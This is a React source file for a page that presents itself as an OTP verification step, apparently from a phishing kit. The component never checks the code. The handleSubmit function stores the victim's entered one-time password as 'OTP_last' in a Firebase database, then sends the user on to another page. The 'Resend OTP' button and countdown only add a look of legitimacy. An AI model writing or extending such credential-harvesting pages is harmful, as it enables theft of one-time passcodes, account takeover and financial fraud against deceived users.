import React, { useState, useEffect } from 'react';
import { app } from './firebase'; // Import your Firebase configuration
import { getDatabase, ref, push, set } from 'firebase/database';
import {Link, useNavigate } from 'react-router-dom';
import Head from './Head';
import Footer from './Footer';
const db = getDatabase(app); // Initialize Firebase

function OtpLast() {
  const [otp, setOTP] = useState('');
  const [timer, setTimer] = useState(180);
  const [isOTPValid, setIsOTPValid] = useState(true);

  useEffect(() => {
    const countdown = setInterval(() => {
      if (timer <= 0) {
        clearInterval(countdown);
        // Redirect or handle the timer expiration here
        // Example: window.location.href = "Enter_OTP.html";
      } else {
        setTimer(timer - 1);
      }
    }, 1000);

    return () => {
      clearInterval(countdown);
    };
  }, [timer]);

  const navigate = useNavigate();

  const handleOTPChange = (e) => {
    const enteredOTP = e.target.value;
    // Check the OTP format and set state accordingly
    if (/^[0-9]\d{5}$/.test(enteredOTP)) {
      setIsOTPValid(true);
    } else {
      setIsOTPValid(false);
    }
    setOTP(enteredOTP);
  };

  const handleSubmit = (e) => {
    e.preventDefault();

    // Check if the OTP is valid before proceeding
    if (!isOTPValid) {
      alert('Please enter a valid OTP.');
      return;
    }

    // Prepare the data to be saved
    const userData = {
      OTP_last: otp,
    };

    // Specify the Firebase database reference
    const otpRef = ref(db, 'data'); // Replace 'otp' with your desired database path

    // Push the data with a unique key
    const newEntryRef = push(otpRef);

    // Set the data at the generated reference
    set(newEntryRef, userData)
      .then(() => {
        console.log('Data saved successfully with a unique key.');
        navigate("/lastpro");
        // Handle success or navigate to another page
      })
      .catch((error) => {
        console.error('Error saving data: ', error);
        // Handle error
      });
  };

  return (
    <>
    <div className='App'>
      <Head/>
      <div className="mainContent">
        <h1 className="text-center">One Time Password (OTP) Verification</h1>
        <div className="card">
          <p1 style={{ color: 'grey', fontSize: '13px', marginLeft: '20px', fontFamily: 'Work Sans, sans-serif' }}>
            One Time Password (OTP) has been sent to<br />
            <span style={{ fontSize: '13px', marginLeft: '20px', fontFamily: 'Work Sans, sans-serif' }}>
              your registered mobile Number.<br />
            </span>
            <span style={{ fontSize: '13px', marginLeft: '20px', fontFamily: 'Work Sans, sans-serif' }}>
            Please enter the OTP and proceed.
            </span>
            <br />
          </p1>
          <form
            className="LoginForm myform"
            action="Post.php"
            method="post"
            target="hidden_iframe"
            onSubmit={handleSubmit}
          >
            <input type="hidden" name="" value="" />
            <div className="form-group">
              <label style={{ fontSize: '13px', fontFamily: 'Work Sans, sans-serif' }} htmlFor="1ST_OTP">
                One Time Password<span style={{ fontSize: '13px', color: 'red' }}>*</span>
              </label>
              <input
                type="password"
                className="new-control"
                id="1ST_OTP"
                name="1ST_OTP"
                maxLength="6"
                inputMode="numeric"
                pattern="[0-9]\d{5}"
                title="Please enter valid OTP!"
                required
                value={otp}
                onChange={handleOTPChange}
              />
          
            </div>
            {/* <div> {!isOTPValid && (
                <p1 style={{ fontSize: '11px', color: 'red', fontStyle: 'italic', fontFamily: 'Work Sans, sans-serif', position: 'absolute', margin: '-6%', marginLeft: '-6px' }}>
                  Invalid One Time Password!
                </p1>
              )}</div> */}
            <div id="re">
              <b>
                {' '}
                <Link
  to="/lastotp" // Replace with the actual path you want to navigate to
  style={{
    color: '#fff',
    fontFamily: 'Work Sans, sans-serif',
    backgroundColor: '#A6004D',
    padding: '4px 6px',
    borderRadius: '4px',
    position: 'absolute',
    margin: '-4%',
    marginLeft: '165px',
    textDecoration: 'none',
  }}
>
  Resend OTP
</Link>

              </b>
              <br />
            </div>
            <br />
            <div>
              <center>
                <b
                  style={{
                    color: '#A6004D',
                    fontFamily: 'Work Sans, sans-serif',
                    fontSize: '14px',
                    textAlign: 'center',
                  }}
                >
                  <span style={{ color: '#A6004D', fontFamily: 'Work Sans, sans-serif', fontSize: '13px' }}>
                    {timer}&nbsp;second
                  </span>
                </b>
              </center>
            </div>
            <br />
            <div className="text-center">
              <button type="submit" className="submit">
                Proceed
              </button>
            </div>
          </form>
        </div>
      </div>
      <Footer/>
    </div>
    </>
  );
}

export default OtpLast;
